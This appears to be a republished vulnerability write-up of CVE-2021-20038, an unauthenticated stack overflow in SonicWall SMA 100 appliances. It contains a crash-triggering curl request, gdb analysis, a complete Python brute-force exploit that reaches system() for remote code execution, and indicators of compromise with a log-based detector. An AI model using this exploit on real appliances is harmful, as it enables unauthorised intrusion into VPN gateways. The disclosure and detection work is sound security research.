CVE-2021-20038
2022-06-23 06:18:00 【Khan security team】
Description
On December 7, 2021, SonicWall released new firmware for the Secure Mobile Access (SMA) 100 series. On January 11, 2022, SonicWall published a security advisory informing users of the Rapid7-discovered security issues fixed in December. The key issue is an unauthenticated stack-based buffer overflow in the web interface that allows a remote attacker to execute arbitrary code as the nobody user. The vulnerability is tracked as CVE-2021-20038 with a CVSS score of 9.8.
Before this AttackerKB entry was published, there was no public proof-of-concept exploit. However, this entry contains a proof-of-concept exploit and an extended discussion of building a payload for unauthenticated remote code execution. It is unclear whether this issue has been exploited in the wild.
Affected products
The following firmware versions of the SMA 100 series are affected:
- 10.2.1.2-24sv and earlier
- 10.2.1.1-19sv and earlier
- 10.2.1.0-17v and earlier
The 9.x and 10.2.0.x versions are not affected.
Rapid7 analysis
Note that the offsets and addresses discussed in this analysis are from SMA 10.2.1.1-19sv; they may vary slightly between versions.
CVE-2021-20038 is a stack-based buffer overflow in the httpd binary. The SonicWall SMA 100 series uses a modified version of the Apache HTTP Server, and one of SonicWall's modifications introduces this vulnerability. The problem is in how environment variables are constructed in mod_cgi.so: because the attacker-supplied QUERY_STRING is not subject to any kind of length check, an attacker can overflow a stack-based buffer via strcat.
An overlong QUERY_STRING also causes the subsequent bounds checks on the buffer to fail because of an integer overflow, so a series of further strcat calls write even further beyond the bounds of the stack-based buffer.
The following curl command demonstrates how to crash the HTTP server:
```
[email protected]:~$ curl --insecure "https://10.0.0.7/?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
curl: (52) Empty reply from server
```
The final strcat call, as seen from gdb, is shown below. Note that the vulnerable buffer starts at 0xbfb6ae42 and should be limited to 400 bytes.
```
Breakpoint 1, 0xb69a88c3 in ?? () from /lib/mod_cgi.so
(gdb) disas 0xb69a88c3,0xb69a88c8
Dump of assembler code from 0xb69a88c3 to 0xb69a88c8:
=> 0xb69a88c3: call 0xb69a6a0c <strcat@plt>
End of assembler dump.
(gdb) x/2wx $esp
0xbfb6acc0: 0xbfb6ae42 0x0969e9a8
(gdb) printf "%s\n", 0xbfb6ae42
10.0.0.9 QUERY_STRING=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA WAF_NOT_LICENSED=1SCRIPT_URL=/SCRIPT_URI=https://10.0.0.7/HTTPS=onHTTP_HOST=10.0.0.7HTTP_USER_AGENT=curl/7.74.0HTTP_ACCEPT=*/*SERVER_SIGNATURE=SERVER_SOFTWARE=SonicWALL SSL-VPN Web ServerSERVER_NAME=10.0.0.7SERVER_ADDR=10.0.0.7SERVER_PORT=443REMOTE_ADDR=10.0.0.9DOCUMENT_ROOT=/usr/src/EasyAccess/www/htdocsREQUEST_SCHEME=httpsCONTEXT_PREFIX=CONTEXT_DOCUMENT_ROOT=/usr/src/EasyAccess/www/[email protected]_FILENAME=/usr/src/EasyAccess/www/cgi-bin/staticContentREMOTE_PORT=42326GATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/1.1REQUEST_METHOD=GET
(gdb) printf "%s\n", 0x0969e9a8
REQUEST_URI=/?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(gdb)
```
Overflow causes a crash due to invalid memory access .
```
Program received signal SIGSEGV, Segmentation fault.
0xb69a8fe9 in ?? () from /lib/mod_cgi.so
(gdb) disas 0xb69a8fe6,0xb69a8ff9
Dump of assembler code from 0xb69a8fe6 to 0xb69a8ff9:
   0xb69a8fe6: mov 0x8(%ebp),%eax
=> 0xb69a8fe9: mov 0x110(%eax),%eax
   0xb69a8fef: movl $0x2000,0x10(%esp)
   0xb69a8ff7: movl $0x0,0x14(%esp)
End of assembler dump.
(gdb) print $eax
$1 = 1094795585
(gdb) x/1wx $eax
0x41414141: Cannot access memory at address 0x41414141
(gdb) bt
#0 0xb69a8fe9 in ?? () from /lib/mod_cgi.so
#1 0x41413f2f in ?? ()
#2 0x41414141 in ?? ()
#3 0x41414141 in ?? ()
#4 0x41414141 in ?? ()
#5 0x41414141 in ?? ()
#6 0x41414141 in ?? ()
```
In the GDB output above, you can see mod_cgi.so attempting to dereference the pointer stored at $ebp+8, but it gets the invalid address 0x41414141, or AAAA. This comes from the "payload" part of the message we sent with curl. In fact, let's review the entire environment array that overflowed the buffer, starting at $ebp-982:
```
(gdb) printf "%s\n", $ebp-982
10.0.0.9 QUERY_STRING=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA WAF_NOT_LICENSED=1SCRIPT_URL=/SCRIPT_URI=https://10.0.0.7/HTTPS=onHTTP_HOST=10.0.0.7HTTP_USER_AGENT=curl/7.74.0HTTP_ACCEPT=*/*SERVER_SIGNATURE=SERVER_SOFTWARE=SonicWALL SSL-VPN Web ServerSERVER_NAME=10.0.0.7SERVER_ADDR=10.0.0.7SERVER_PORT=443REMOTE_ADDR=10.0.0.9DOCUMENT_ROOT=/usr/src/EasyAccess/www/htdocsREQUEST_SCHEME=httpsCONTEXT_PREFIX=CONTEXT_DOCUMENT_ROOT=/usr/src/EasyAccess/www/[email protected]pnSCRIPT_FILENAME=/usr/src/EasyAccess/www/cgi-bin/staticContentREMOTE_PORT=42326GATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/1.1REQUEST_METHOD=GETREQUEST_URI=/?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASCRIPT_NAME=/index.html
```
mod_cgi.so is attempting to load *(*($ebp+8)+0x110) to pass it as the first argument to ap_get_brigade.
ap_get_brigade is a standard Apache httpd function, so we can easily find its source code:
```c
AP_DECLARE(apr_status_t) ap_get_brigade(ap_filter_t *next,
                                        apr_bucket_brigade *bb,
                                        ap_input_mode_t mode,
                                        apr_read_type_e block,
                                        apr_off_t readbytes)
{
    if (next) {
        return next->frec->filter_func.in_func(next, bb, mode, block,
                                               readbytes);
    }
    return AP_NOBODY_READ;
}
```
The parameter we overwrite with the buffer overflow is the first parameter: ap_filter_t* next. If the pointer is not null, it is used to call a function stored in memory. In theory, because the attacker overwrites this pointer, they can control which function gets called, which results in unauthenticated remote code execution.
Writing an RCE exploit
Normally, a stack-based buffer overflow like this is exploited via ret, returning to an address chosen by the attacker. However, because of the way the logic flows in mod_cgi.so, the attacker cannot reach a controllable ret without first running into a series of unavoidable memory access violations. Therefore, the most viable exploitation vector is controlling the ap_get_brigade function call.
Before we get into writing an exploit, we need to understand the mitigations deployed on the system, and in particular how httpd is affected by them.
```
[email protected]:~ # cat /proc/sys/kernel/randomize_va_space
2
```
Here we can see that the SonicWall SMA 100 series has full address space layout randomization (ASLR) enabled, which means we should expect the stack, heap, libraries and main executable to all be loaded at random addresses.
However, some properties of httpd weaken ASLR. The first is the main executable: httpd is not compiled as a position-independent executable, so it cannot be loaded at a random base address. It will predictably be loaded at 0x8048000 every time.
```
[email protected]:~ # cat /proc/26775/maps
08048000-080e0000 r-xp 00000000 01:00 100949 /usr/src/EasyAccess/bin/httpd
080e0000-080e3000 rw-p 00098000 01:00 100949 /usr/src/EasyAccess/bin/httpd
080e3000-080e6000 rw-p 00000000 00:00 0
```
Additionally, the httpd server uses Apache's prefork feature.
```
[email protected]:~ # /usr/src/EasyAccess/bin/httpd -l
Compiled in modules:
  core.c
  mod_so.c
  http_core.c
  prefork.c
```
This means httpd forks a series of child processes to handle incoming HTTP requests. That is important because a forked child process has the same memory layout as its parent: all child processes will have exactly the same stack, heap and library addresses as the parent. Also worth noting is that when a child process crashes, the main httpd executable simply spawns a new one to replace it. This gives the attacker the opportunity to guess at valid addresses.
Exploiting the overflow through ap_get_brigade presents some challenges: controlling the function call requires three dereferences and a fairly specific memory layout. We did write a small program to search for such gadgets and eventually found some, but they turned out to be unusable (for example, they just led to new frustrating memory access violations).
With no usable existing gadget, we need to introduce the required pattern into the system ourselves. That means getting the pattern into the heap or the stack and correctly guessing its location. The heap space of httpd is actually quite large, and an attacker can get a usable pattern into heap memory, but predicting where uClibc's malloc might place it is not something we wanted to assume is practical (although it is likely feasible). This pushed me toward getting the usable pattern onto the stack.
Using the stack in this case has several benefits. First, because httpd is a 32-bit executable, only 11 bits of randomness are applied to the top address of the stack.
| byte 1 | byte 2 | byte 3 | byte 4 |
|---|---|---|---|
| 0xbf | highest bit always set | lowest 4 bits always 0 (page alignment) | page alignment (also 0) |
This means we know the top address of the stack will always be in the range 0xbf800000 to 0xbffff000, which reduces the possible stack-top addresses to 2047. Of course, we then still need to guess the actual address that overwrites $ebp+8 in order to exploit the vulnerability. However, we know it will be close to the top of that range. If we naively brute-force a 0x2000 address range for every possible top address, we should successfully guess the correct address within 16 million HTTP requests.
16 million requests is a lot! Indeed it is. But remember, this is just the naive approach, and it could probably be improved a great deal; we just wanted to be sure it was possible. Still, we can reduce it a little. We know our destination address will always end in 0, which reduces the number of requests needed to 1 million HTTP requests.
Savvy readers and experienced exploit developers may point out that we can reduce the number of requests further by repeating the exploit pattern over and over in the payload. That's a good idea! Unfortunately, we have to deal with factors that limit our ability to reuse the pattern:
- QUERY_STRING is not URL-decoded, so we can't (reasonably) use the largest part of the exploit to actually... exploit.
- The requested page does get URL-decoded, but there are limitations on its size and on decoding %00.
- The stack-based buffer overflow occurs very close to the top of the stack, so writing much more than 1700 bytes risks touching the address past the top of the stack, or simply overwriting global variables we may need later (for example env[] when system is invoked).
- A bunch of boring, useless or duplicate environment variables outside our control occupy most of those 1700 bytes.
Given these limitations, we wrote an exploit that tries to send all of the roughly 1 million HTTP GET requests needed to brute-force the usable address. Again, it must be stressed that this can be improved a great deal; the following is strictly a "this is possible" kind of thing.
```python
import socket
import ssl
import time

# Enumerate every possible stack-top address (page aligned, 0xbf800000..0xbffff000).
base = 0xbf800000
curr = base
step = 0x1000
base_array = []
while curr != 0xbffff000:
    base_array.append(curr)
    curr += step
print("Generated " + hex(len(base_array)) + " stack top addr")

# For each stack top, search a 0x2000 window below it in 0x10 steps.
all_array = []
for base in base_array:
    search_start = base - 0x2800
    search_end = base - 0x0800
    curr = search_start
    while curr != search_end:
        curr += 0x10
        all_array.append(curr)
print("Generated " + hex(len(all_array)) + " search addresses")

print("Sending sploits...")
for address in all_array:
    print(hex(address), end='\r')
    address -= 0x110
    address += 4
    # transform bytes into url encoded
    one = (address >> 24) & 0x000000ff
    two = (address >> 16) & 0x000000ff
    three = (address >> 8) & 0x000000ff
    four = (address & 0x000000ff)
    if one == 0 or two == 0 or three == 0 or four == 0:
        # the server won't accept a null byte
        continue
    addr_one = b"%" + str.encode('{:02x}'.format(four)) + b"%" + str.encode('{:02x}'.format(three)) + b"%" + str.encode('{:02x}'.format(two)) + b"%" + str.encode('{:02x}'.format(one))
    address += 0x110
    address += 4
    # transform bytes into url encoded
    one = (address >> 24) & 0x000000ff
    two = (address >> 16) & 0x000000ff
    three = (address >> 8) & 0x000000ff
    four = (address & 0x000000ff)
    if one == 0x28 or two == 0x28 or three == 0x28 or four == 0x28:
        # oh no the guy that wrote this is a hack! Should have
        # shifted the payload so meta characters wouldn't matter.
        # oh well :(
        continue
    addr_two = b"%" + str.encode('{:02x}'.format(four)) + b"%" + str.encode('{:02x}'.format(three)) + b"%" + str.encode('{:02x}'.format(two)) + b"%" + str.encode('{:02x}'.format(one))
    system_addr = b"%64%b8%06%08"
    shell_cmd = b";{touch,/tmp/lol};"
    #payload = ((b"%94%d7%ba%bf") + (b"%a8%d8%ba%bf") + (b"%a8%d8%ba%bf") + (b"%64%b8%06%08") + b";{touch,/tmp/lol};")*2
    exploit = addr_one + addr_two + addr_two + system_addr + shell_cmd
    payload = exploit*2
    spray_pray = b"/" + payload + b"?" + (b'z'*518)
    request = b'GET ' + spray_pray + b'\r\n\r\n'
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    wrappedSocket = ssl.wrap_socket(sock)
    wrappedSocket.connect(("10.0.0.7", 443))
    wrappedSocket.send(request)
    wrappedSocket.recv(1280)
    wrappedSocket.close()
```
The most interesting part of this exploit is the generated GET request. As seen by the HTTP server, it looks something like this:
```
GET /%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf%64%b8%06%08;{touch,/tmp/lol};%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf%64%b8%06%08;{touch,/tmp/lol};?zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
```
The exploit payload (repeated twice, although the exploit does not take advantage of the repetition) consists of four addresses and a string to be passed to system:
- 0xbf7fd704
- 0xbf7fd818
- 0xbf7fd818
- 0x0806b864
- ;{touch,/tmp/lol};
The first address, when 0x110 is added to it and the result dereferenced, resolves to the second address. The second address, when dereferenced, points to the third address. The third address plus four points to the fourth address, which resolves to system. The string passed to system starts at 0xbf7fd818, so there are some junk characters before /bin/sh reaches touch /tmp/lol.
Testing the exploit against a target whose stack-top address was 0xbfb6c000, it landed after 4 hours and 43 minutes.
```
[email protected]:~ # date
Thu Nov 25 03:29:39 PST 2021
[email protected]:~ # ls -l /tmp/lol
ls: cannot access /tmp/lol: No such file or directory
[email protected]:~ # ls -l /tmp/lol
-rw-r--r-- 1 nobody nobody 0 Nov 25 08:05 /tmp/lol
```
As you can see, the attacker gains code execution as nobody.
The exploit above is not good, for many reasons. Some of them:
- A repeating pattern could be used to guess multiple addresses in a single HTTP request.
- A smaller scan range could be used (0x800 to 0x2800 is a very large range).
- If address 3 contains a bad shell character (for example `(`), the exploit breaks.
The exploit also does not account for possible alignment problems when:
- The target does not use the hostname sslvpn.
- The target IP and host IP are not 8 bytes long.
- The target port is not 3 bytes long.
- The source port is not 5 bytes long.
Nevertheless, this alone demonstrates that, despite the challenges, this issue is absolutely exploitable and should be patched as soon as possible. We have also addressed some of these problems in a more mature exploit containing a weaponized payload, which can be found on GitHub.
Indicators of compromise
The attack, especially as described here, is quite noisy. The best place to look for indicators of compromise is httpd.log. It can be obtained through the web interface: System -> Diagnostics -> Tech Support Report -> Download Report. The httpd.log file will be inside the zip archive. Logged segmentation faults are a sign of potential compromise. Here is a fragment of httpd.log from my system after exploitation:
```
[Thu Nov 25 13:30:11.805181 2021] [core:notice] [pid 1779] AH00052: child pid 30485 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.805375 2021] [core:notice] [pid 1779] AH00052: child pid 30486 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.805571 2021] [core:notice] [pid 1779] AH00052: child pid 30487 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.805765 2021] [core:notice] [pid 1779] AH00052: child pid 30488 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.843348 2021] [core:notice] [pid 1779] AH00052: child pid 30489 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.843583 2021] [core:notice] [pid 1779] AH00052: child pid 30490 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.843785 2021] [core:notice] [pid 1779] AH00052: child pid 30491 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.843983 2021] [core:notice] [pid 1779] AH00052: child pid 30492 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.844214 2021] [core:notice] [pid 1779] AH00052: child pid 30493 exit signal Segmentation fault (11)
```
Of course, an attacker can delete this log file shortly after exploiting the system, but it is still worth checking in order to catch an attacker who attempted exploitation and did not clean up properly.
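The brute-force described above kills one prefork child per wrong guess, so the useful signal in httpd.log is not a single AH00052 line but a dense burst of them. The following detector is an added example (not Rapid7's or SonicWall's tooling) that parses the Apache AH00052 notices, keeps only SIGSEGV child exits, and raises an alert when a configurable number of them fall inside a sliding time window; a single isolated crash is deliberately ignored. The sample log is constructed from the excerpt above plus two made-up lines (a benign startup notice and one lone crash later on).

```python
"""Flag bursts of prefork child segfaults in an Apache httpd.log (added example)."""
import re
from collections import deque
from datetime import datetime, timedelta

# Apache writes this notice when a prefork child exits on a signal.
AH00052_RE = re.compile(
    r"^\[(?P<ts>[A-Z][a-z]{2} [A-Z][a-z]{2} \d{1,2} \d{2}:\d{2}:\d{2}\.\d{6} \d{4})\] "
    r"\[core:notice\] \[pid (?P<parent>\d+)\] AH00052: child pid (?P<child>\d+) "
    r"exit signal (?P<signame>[A-Za-z ]+) \((?P<signum>\d+)\)"
)

# Constructed sample: the nine crash lines from the excerpt above, a benign
# startup notice before them, and one isolated crash ten minutes later.
SAMPLE_HTTPD_LOG = """\
[Thu Nov 25 13:25:00.000000 2021] [mpm_prefork:notice] [pid 1779] AH00163: Apache configured -- resuming normal operations
[Thu Nov 25 13:30:11.805181 2021] [core:notice] [pid 1779] AH00052: child pid 30485 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.805375 2021] [core:notice] [pid 1779] AH00052: child pid 30486 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.805571 2021] [core:notice] [pid 1779] AH00052: child pid 30487 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.805765 2021] [core:notice] [pid 1779] AH00052: child pid 30488 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.843348 2021] [core:notice] [pid 1779] AH00052: child pid 30489 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.843583 2021] [core:notice] [pid 1779] AH00052: child pid 30490 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.843785 2021] [core:notice] [pid 1779] AH00052: child pid 30491 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.843983 2021] [core:notice] [pid 1779] AH00052: child pid 30492 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.844214 2021] [core:notice] [pid 1779] AH00052: child pid 30493 exit signal Segmentation fault (11)
[Thu Nov 25 13:40:00.000000 2021] [core:notice] [pid 1779] AH00052: child pid 30600 exit signal Segmentation fault (11)
"""


def parse_crash(line):
    """Return (timestamp, child_pid, signal_number) for an AH00052 line, else None."""
    m = AH00052_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S.%f %Y")
    return ts, int(m.group("child")), int(m.group("signum"))


def find_segfault_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Return one alert per burst of >= threshold SIGSEGV child exits within `window`.

    Each alert records the first and last crash time and the child PIDs involved.
    The deque is cleared after an alert so the same burst is not reported twice.
    """
    alerts = []
    recent = deque()  # (timestamp, child_pid) of SIGSEGV exits inside the window
    for line in lines:
        parsed = parse_crash(line)
        if parsed is None or parsed[2] != 11:  # 11 == SIGSEGV on Linux
            continue
        ts, child, _ = parsed
        recent.append((ts, child))
        while recent and ts - recent[0][0] > window:
            recent.popleft()
        if len(recent) >= threshold:
            alerts.append({
                "start": recent[0][0],
                "end": ts,
                "children": [pid for _, pid in recent],
            })
            recent.clear()
    return alerts


if __name__ == "__main__":
    for alert in find_segfault_bursts(SAMPLE_HTTPD_LOG.splitlines()):
        print(f"{alert['start']} .. {alert['end']}: "
              f"{len(alert['children'])} httpd children segfaulted {alert['children']}")
```

Run it over the httpd.log extracted from the tech support report (`find_segfault_bursts(open(path).readlines())`). The threshold and window are deliberately conservative; a brute-force of the kind shown above produces thousands of crashes per hour, so even a much higher threshold would still fire, while the occasional single child crash on a healthy appliance stays below it.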
The status.txt log may also be of interest. Specifically, it contains the output of ps for all running processes. Unfortunately, reviewing this log requires familiarity with what should and should not be running on the system, which is hard for a layperson to know. Looking at this output from my system, we can easily identify gdb and busybox as anomalies.
```
Processes
-----------------------------------------------------------------
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 2068 584 ? Ss Nov27 0:42 init [3]
root 2 0.0 0.0 0 0 ? S Nov27 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S Nov27 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S Nov27 0:00 [kworker/0:0]
root 5 0.0 0.0 0 0 ? S< Nov27 0:00 [kworker/0:0H]
root 6 0.0 0.0 0 0 ? S Nov27 0:00 [kworker/u4:0]
root 7 0.0 0.0 0 0 ? S Nov27 2:12 [rcu_sched]
root 8 0.0 0.0 0 0 ? S Nov27 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S Nov27 0:06 [migration/0]
root 10 0.0 0.0 0 0 ? S Nov27 0:15 [migration/1]
root 11 0.0 0.0 0 0 ? S Nov27 0:01 [ksoftirqd/1]
root 13 0.0 0.0 0 0 ? S< Nov27 0:00 [kworker/1:0H]
root 14 0.0 0.0 0 0 ? S< Nov27 0:00 [khelper]
root 15 0.0 0.0 0 0 ? S< Nov27 0:00 [netns]
root 461 0.0 0.0 0 0 ? S< Nov27 0:00 [writeback]
root 463 0.0 0.0 0 0 ? S< Nov27 0:00 [bioset]
root 465 0.0 0.0 0 0 ? S< Nov27 0:00 [kblockd]
root 622 0.0 0.0 0 0 ? S< Nov27 0:00 [ata_sff]
root 632 0.0 0.0 0 0 ? S Nov27 0:00 [khubd]
root 742 0.0 0.0 0 0 ? S Nov27 0:01 [kworker/0:1]
root 757 0.0 0.0 0 0 ? S Nov27 0:00 [kswapd0]
root 758 0.0 0.0 0 0 ? SN Nov27 0:00 [ksmd]
root 825 0.0 0.0 0 0 ? SN Nov27 0:00 [khugepaged]
root 826 0.0 0.0 0 0 ? S Nov27 0:00 [fsnotify_mark]
root 845 0.0 0.0 0 0 ? S< Nov27 0:00 [crypto]
root 1011 0.0 0.0 0 0 ? S Nov27 0:01 [kworker/1:1]
root 1061 0.0 0.0 0 0 ? S< Nov27 0:00 [iscsi_eh]
root 1065 0.0 0.0 0 0 ? S< Nov27 0:00 [kworker/0:1H]
root 1069 0.0 0.0 0 0 ? S< Nov27 0:00 [fc_exch_workque]
root 1070 0.0 0.0 0 0 ? S< Nov27 0:00 [fc_rport_eq]
root 1071 0.0 0.0 0 0 ? S< Nov27 0:00 [fcoethread/0]
root 1072 0.0 0.0 0 0 ? S< Nov27 0:00 [fcoethread/1]
root 1075 0.0 0.0 0 0 ? S< Nov27 0:00 [fnic_event_wq]
root 1076 0.0 0.0 0 0 ? S< Nov27 0:00 [fnic_fip_q]
root 1078 0.0 0.0 0 0 ? S< Nov27 0:00 [bnx2fc_l2_threa]
root 1079 0.0 0.0 0 0 ? S< Nov27 0:00 [bnx2fc_thread/0]
root 1080 0.0 0.0 0 0 ? S< Nov27 0:00 [bnx2fc_thread/1]
root 1107 0.0 0.0 0 0 ? S Nov27 0:00 [scsi_eh_0]
root 1149 0.0 0.0 0 0 ? S< Nov27 0:00 [bnx2i_thread/0]
root 1150 0.0 0.0 0 0 ? S< Nov27 0:00 [bnx2i_thread/1]
root 1197 0.0 0.0 0 0 ? S< Nov27 0:00 [bond0]
root 1244 0.0 0.0 0 0 ? S< Nov27 0:00 [cnic_wq]
root 1246 0.0 0.0 0 0 ? S< Nov27 0:00 [cxgb4]
root 1257 0.0 0.0 0 0 ? S Nov27 0:00 [kworker/1:2]
root 1308 0.0 0.0 0 0 ? S< Nov27 0:00 [deferwq]
root 1322 0.0 0.0 0 0 ? S Nov27 0:00 [kjournald]
root 1328 0.0 0.0 0 0 ? S< Nov27 0:00 [loop0]
root 1407 0.0 0.0 13752 2744 ? Sl Nov27 1:45 /usr/sbin/vmtoolsd
root 1408 0.0 0.0 0 0 ? S< Nov27 0:00 [kworker/1:1H]
root 1435 0.0 0.0 2376 588 ? Ss Nov27 0:00 /usr/sbin/fcron
root 1447 0.0 0.4 19712 16996 pts/1 S+ 03:51 0:00 ./gdb -p 30092
root 1483 0.0 1.4 93152 59728 ? Sl Nov27 0:55 /usr/bin/python3.6 /usr/src/EasyAccess/www/python/authentication_api/restful_api.py
nobody 1526 0.0 0.0 0 0 ? Z 03:52 0:00 [staticContent] <defunct>
root 1551 0.0 0.2 20720 11124 ? Ss Nov27 1:42 /usr/src/EasyAccess/bin/smm -d
root 1627 0.0 0.0 1904 224 ? Ss Nov27 0:00 /usr/sbin/ntpUpdate -d -i 3600 -p time.nist.gov -s time.windows.com
root 1634 0.0 0.0 2120 596 ? Ss Nov27 0:00 /usr/sbin/syslogd -m 0
root 1639 0.0 0.0 3136 1684 ? Ss Nov27 0:00 /usr/sbin/klogd -c 1
root 1712 0.0 0.0 13208 1980 ? Ss Nov27 0:00 /usr/sbin/crlUpdate -d -i 1440
root 1719 0.0 0.0 13828 1968 ? Ss Nov27 0:03 htcacheclean -nti -d60 -l5M -p/var/webcache
root 1735 0.0 0.0 13164 1740 ? Ss Nov27 0:00 /usr/src/EasyAccess/bin/anonySessionD
root 1737 0.0 0.0 13164 1492 ? S Nov27 0:00 /usr/src/EasyAccess/bin/anonySessionD
root 1740 0.0 0.0 14320 3484 ? Ss Nov27 0:00 /usr/src/EasyAccess/bin/firebase -d
root 1748 0.0 0.3 45472 15316 ? Sl Nov27 0:00 /usr/bin/node /usr/src/EasyAccess/bin/js/master.js
root 1749 0.0 0.0 2080 268 ? S Nov27 0:00 cat
root 1752 0.0 0.3 45308 15408 ? Sl Nov27 0:00 /usr/bin/node --debug-port=5859 /usr/src/EasyAccess/bin/js/ssoProxy.js
root 1760 0.0 0.0 13616 2116 ? Ss Nov27 0:00 /usr/src/EasyAccess/bin/wireguard -d
root 1779 0.8 0.2 23468 8940 ? Ss Nov27 21:47 /usr/src/EasyAccess/bin/httpd
root 1805 0.0 0.0 13852 2556 ? Ss Nov27 0:00 /usr/src/EasyAccess/bin/ftpsession -d
